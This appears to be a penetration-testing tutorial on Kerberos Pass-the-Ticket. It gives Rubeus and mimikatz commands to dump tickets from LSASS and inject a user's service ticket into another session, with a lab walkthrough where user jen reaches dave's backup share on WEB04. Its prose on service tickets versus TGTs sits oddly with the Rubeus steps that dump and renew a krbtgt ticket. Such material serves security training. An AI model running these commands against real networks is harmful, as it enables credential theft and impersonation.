Pass-the-Ticket

The Pass-the-Ticket (PtT) attack abuses Kerberos TGS to impersonate users and access network resources. A TGT is used to request TGS from the KDC and is typically bound to the logon context in which it was issued. In contrast, a TGS is issued for a specific service and can be extracted from memory and injected into another session, allowing it to be reused for authentication.

The core premise of the attack is simple: an attacker extracts a valid TGS from LSASS memory and injects it into their current session to access the corresponding service as the impersonated user. If the ticket belongs to the current user, administrative privileges are not required. This enables lateral movement without needing to dump credentials or interact extensively with LSASS, potentially reducing detection opportunities.

However, improper ticket injection can disrupt existing authentication contexts. If a ticket is injected into an active logon session without isolating it, it may overwrite an existing Kerberos ticket. For example, if the local machine account (SYSTEM$) loses its ticket, it will not automatically obtain a new one until the system is rebooted. Likewise, if a service account’s ticket is overwritten, the service may fail to authenticate until it is restarted or the machine reboots.

To prevent this, operators often create a sacrificial process that establishes a new logon session and isolates the injected ticket. This approach minimizes operational impact but typically requires elevated privileges. Tools such as Rubeus require administrative rights because they spawn a NetOnly process to create a new logon session for safe ticket injection. In contrast, command and control frameworks such as Covenant and Cobalt Strike can create new logon sessions using built-in features such as maketoken, often without requiring local administrative privileges, as they manage process interaction through mechanisms such as named pipes.

# Create a sacrificial process (show -> shows the created process)
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# Check all the tickets that can be read and extracted
.\Rubeus.exe triage

# Extract the target ticket
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Request a new TGT
Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt

In the below example, dave has privileged access to the backup folder on WEB04, but the compromised user, jen, does not.

# Check jen's permissions
> whoami
corp\jen
> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.

First, we want to extract all tickets from LSASS. mimikatz will dump them all to .kirbi files.

# Dump tickets from LSASS
privilege::debug
sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

We can inspect the dumped ticket files and confirm that a TGS for dave accessing web04 exists.

> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...

We can then inject dave's WEB04 TGS into jen's session in order to access the backup folder.

# Inject dave's TGS into jen's session
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

# List the cached tickets
> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

# Confirm access
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt